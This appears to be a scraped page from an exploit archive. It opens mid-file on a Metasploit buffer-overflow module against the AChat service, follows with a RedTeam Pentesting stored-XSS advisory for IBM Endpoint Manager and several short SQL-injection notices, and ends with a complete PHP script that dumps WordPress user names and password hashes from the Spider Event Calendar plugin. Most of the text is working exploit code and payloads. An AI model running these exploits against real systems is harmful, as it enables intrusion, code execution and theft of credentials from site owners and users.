      'DisclosureDate' => 'Dec 18 2014'))

    register_options(
      [
        Opt::RPORT(9256)
      ], self.class)
  end

  def exploit
    connect_udp

    # 0055 00          ADD BYTE PTR SS:[EBP],DL # padding
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # padding
    # 55               PUSH EBP                 # ebp holds a close pointer to the payload
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # mov eax, ebp
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 05 00140011      ADD EAX,11001400         # adjusting eax
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 50               PUSH EAX                 # eax points to the start of the shellcode
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # padding
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 59               POP ECX                  # padding
    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"

    sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
    sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
    sploit << "\x61\x40" # POPAD + INC EAX

    sploit << target.ret # AChat.exe p/p/r address

    # adjusting the first thread's unicode payload, tricky asm-fu
    # the first seh exception jumps here, first_stage variable will be executed
    # by the second seh exception as well. It needs to be in sync with the second
    # thread, so that is why we adjust eax/ebp to have a close pointer to the
    # payload, then first_stage variable will take the rest of the job.
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 55               PUSH EBP                 # ebp with close pointer to payload
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 58               POP EAX                  # put ebp to eax
    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
    # 2A00             SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
    # 05 00140011      ADD EAX,11001400         # more adjusting
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 50               PUSH EAX			# saving eax
    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
    # 5D               POP EBP			# mov ebp, eax
    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
    sploit << "\x00" + 'A' * 10 + "\x00"

    i = 0
    while i < sploit.length do
      if i > 172000
        Rex::sleep(1.0)
      end
      sent = udp_sock.put(sploit[i..i + 8192 - 1])
      i += sent
    end
    disconnect_udp
  end

end
HireHackking 
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
          Page

During a penetration test, RedTeam Pentesting discovered that the IBM
Endpoint Manager Relay Diagnostics page allows anybody to persistently
store HTML and JavaScript code that is executed when the page is opened
in a browser.


Details
=======

Product: IBM Endpoint Manager
Affected Versions:  9.1.x versions earlier than 9.1.1229,
                    9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE:  CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137


Introduction
============

IBM Endpoint Manager products - built on IBM BigFix technology - can
help you achieve smarter, faster endpoint management and security. These
products enable you to see and manage physical and virtual endpoints
including servers, desktops, notebooks, smartphones, tablets and
specialized equipment such as point-of-sale devices, ATMs and
self-service kiosks. Now you can rapidly remediate, protect and report
on endpoints in near real time.

(from the vendor's homepage)


More Details
============

Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
typically serve HTTP and HTTPS on port 52311. There, the server or relay
diagnostics page is normally accessible at the path /rd. That page can
be accessed without authentication and lets users query and modify
different information. For example, a TEM Relay can be instructed to
gather a specific version of a certain Fixlet site by requesting a URL
such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
  &version=1
  &useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the
following URL is requested, the browser executes the JavaScript code
provided in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion
  &version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0

The value of that parameter is also stored in the TEM Relay's site list,
so that the embedded JavaScript code is executed whenever the
diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]

<select NAME="url">
[...]
    <option>http://"><script>alert(/XSS/)</script></option>
</select>


Proof of Concept
================

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
  BESGatherMirrorNew.exe/-gatherversion
  ?Body=GatherSpecifiedVersion&version=1
  &url=http://"><script>alert(/XSS/)</script>
  &version=1
  &useCRC=0


Fix
===

Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.


Security Risk
=============

As the relay diagnostics page is typically not frequented by
administrators and does not normally require authentication, it is
unlikely that the vulnerability can be exploited to automatically and
reliably attack administrative users and obtain their credentials.

Nevertheless, the ability to host arbitrary HTML and JavaScript code on
the relay diagnostics page, i.e. on a trusted system, may allow
attackers to conduct very convincing phishing attacks.

This vulnerability is therefore rated as a medium risk.


Timeline
========

2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
HireHackking 
source: https://www.securityfocus.com/bid/49207/info

Code Widgets Online Job Application is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

The following example input is available:

Username : ' or 1=1 or ''=''
Password: ' or 1=1 or ''=''
HireHackking 
source: https://www.securityfocus.com/bid/49210/info

Code Widgets Multiple Question - Multiple Choice Online Questionaire is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0099/index.asp?Q=2&A=[sqli]
HireHackking 
source: https://www.securityfocus.com/bid/49209/info

Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0077/main.asp?key=[sqli]
HireHackking 
source: https://www.securityfocus.com/bid/49208/info

Code Widgets DataBound Index Style Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/CS0106/category.asp?cat=[sqli]
HireHackking 
<?php
 
/*

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection


 This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.
 
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
 
    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
 
    # Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
    # Date: 2015-02-12
    # Exploit Author: Mateusz Lach
    # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
    # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
    # Version: 1.4.9
    # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
    # CVE : CWE-89
    # OWASP Top10: A1-Injection
 */
 
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
 
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
 
define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
$server = $_GET['SRV'];
if (empty($server))
{
    echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
    $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
    $prefixCurl = curl_init($fullURL);
    curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($prefixCurl);
    if (stripos($result, PATTERN_TO_SEARCH) !== false)
    {
        preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
        $tableName = str_replace('####', '', $tableNames[0]);
        echo 'tableName: '.$tableName.'<BR/>';
        $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
        $usersCurl = curl_init($fullURL);
        curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($usersCurl);  
        if (stripos($result, PATTERN_TO_SEARCH) !== false)
        {
            $from = stripos($result, PATTERN_TO_SEARCH_USERS);
            $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
            $result = substr($result, $from, $to-$from);
            echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
        }
        else
        {
            echo 'Table name fetched, but not users - try to rewrite exploit :-(';
        }
    }
    else
    {
        echo 'NOT vulnerable :-(';
    }
}